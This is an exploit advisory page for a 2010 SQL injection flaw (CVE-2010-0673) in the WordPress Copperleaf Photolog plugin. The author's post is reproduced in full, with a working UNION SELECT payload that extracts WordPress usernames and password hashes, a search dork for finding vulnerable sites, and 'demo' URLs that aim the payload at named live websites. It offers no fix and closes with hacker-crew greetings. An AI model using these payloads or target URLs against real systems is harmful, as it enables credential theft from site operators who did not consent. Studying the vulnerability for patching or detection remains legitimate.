WordPress 0.16 Copperleaf Photolog SQL injection

2010.02.25

Credit: kaMtiEz

Risk: High

Local: No

Remote: Yes

CVE: CVE-2010-0673

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

#############################################################################################################
## WordPress Copperleaf Photolog SQL injection ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : 15 February, 2009 ##
#############################################################################################################
[ Software Information ]
[+] Vendor : http://www.copperleaf.org/
[+] Download : http://www.copperleaf.org/wp-content/code/cpl0.16.zip
[+] version : 0.16 / lower maybe also affected
[+] Vulnerability : SQL
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA
#############################################################################################################
[ Vulnerable File ]
http://127.0.0.1/[kaMtiEz]/wp-content/plugins/cpl/cplphoto.php?postid=[INDONESIANCODER]&id=[VALID ID]
[ XpL]
+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--
[ DEMO ]
[+] Demo Vendor
http://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2097
[+] Demo plugins
http://ozarkedgewildflowers.com/wp-content/plugins/cpl/cplphoto.php?postid=11+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=11
[ FIX ]
dunno :">
#############################################################################################################
[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack,senot
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah.IBl13Z,r3m1ck
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
[ NOTE ]
[+] r3m1ck : look at this .. hha
[+] Don Tukulesto : kapan maen lage ?
[+] d0ntcry : semangat br0th .. belajar terusssss ...
[ QUOTE ]
[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..

References:

http://www.securityfocus.com/bid/38239

http://www.exploit-db.com/exploits/11458

http://secunia.com/advisories/38579

http://packetstormsecurity.org/1002-exploits/wpcopperleaf-sql.txt

http://osvdb.org/62346

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress 0.16 Copperleaf Photolog SQL injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.